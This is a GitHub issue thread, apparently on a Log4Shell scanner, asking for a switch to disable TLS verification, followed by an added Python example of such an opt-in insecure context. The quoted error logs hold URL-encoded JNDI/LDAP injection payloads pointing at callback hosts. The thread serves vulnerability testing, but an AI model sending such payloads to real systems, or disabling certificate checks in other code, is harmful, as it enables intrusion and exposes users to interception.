
Testing "invalid" HTTP sites

Open bortzmeyer opened this issue 2 years ago • 2 comments

Currently, the tool uses a generic library to connect to the HTTPS site and the library rejects connections if there is a TLS problem (expired certificate, unknown CA, etc). This is of course reasonable as a default behavior but it prevents the tool from testing such sites:

EXCEPTION: HTTPSConnectionPool(host='stuff.example', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2Fstuff.example.test.example.com%2F9dxbb6y%7D (Caused by SSLError(SSLError(1, '[SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1123)')))

It could be nice to have a way to disable TLS checks.

bortzmeyer, Jan 06 '22 14:01

I second this. Trying to test sites running with self-signed or older TLS/SSL versions causes an error. Similar error as above, but the line number in _ssl.c is different:

EXCEPTION: HTTPSConnectionPool(host='192.168.1.13', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2F192.168.1.13.test.example.com%2F4k9dv4l%7D (Caused by SSLError(SSLError(1, '[SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:997)')))

This is particularly useful for POC setups, when working with the tool for educational or demonstration purposes, to be able to disable SSL/TLS checks.

msudol, Jan 10 '22 17:01

In addition to the scenario @msudol mentioned, we can be certain adversaries worth their salt won't care about TLS validation or version. It's common for script teens (not kiddies anymore?) to target port 80 and rely on redirections, allowing IPS without decrypt ability to mitigate, but the hardcore actor will not make that mistake.

CyberTaoFlow, Mar 01 '22 18:03
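
An added example, not code from log4j-scanner or from any commenter: one way the opt-in switch requested in this issue could look, using only the Python standard library. It shows that turning off certificate checks does not by itself clear the `UNSUPPORTED_PROTOCOL` error quoted above, because the protocol floor must be lowered too; the names `build_tls_context`, `classify_tls_error` and `probe` are hypothetical.

```python
import ssl
import urllib.error
import urllib.request


def build_tls_context(insecure: bool = False) -> ssl.SSLContext:
    """Strict by default; relaxed only when the operator opts in."""
    ctx = ssl.create_default_context()
    if insecure:
        # Order matters: check_hostname must be off before CERT_NONE is allowed.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # accept expired, self-signed, unknown CA
        # Certificate checks alone do not cure UNSUPPORTED_PROTOCOL: the
        # protocol floor has to be lowered as well.
        ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
        try:
            ctx.set_ciphers("DEFAULT:@SECLEVEL=0")  # OpenSSL-specific string
        except ssl.SSLError:
            pass  # non-OpenSSL backend: keep its default cipher list
    return ctx


def classify_tls_error(exc: object) -> str:
    """Name which relaxation a failed handshake would have needed."""
    if isinstance(exc, ssl.SSLCertVerificationError):
        return "certificate"
    if isinstance(exc, ssl.SSLError):
        return "protocol" if "UNSUPPORTED_PROTOCOL" in str(exc) else "tls-other"
    return "not-tls"


def probe(url: str, insecure: bool = False, timeout: float = 5.0) -> str:
    """Send one GET and report the outcome instead of aborting the scan."""
    try:
        with urllib.request.urlopen(url, timeout=timeout,
                                    context=build_tls_context(insecure)) as resp:
            return f"http {resp.status}"
    except urllib.error.HTTPError as err:
        return f"http {err.code}"  # the request reached the server
    except OSError as err:
        # urllib wraps handshake failures in URLError; unwrap to the cause.
        cause = err.reason if isinstance(err, urllib.error.URLError) else err
        return f"failed ({classify_tls_error(cause)})"
```

Whether a very old protocol version can actually be negotiated still depends on how the local OpenSSL was built, so a "protocol" result can persist even with the relaxed context.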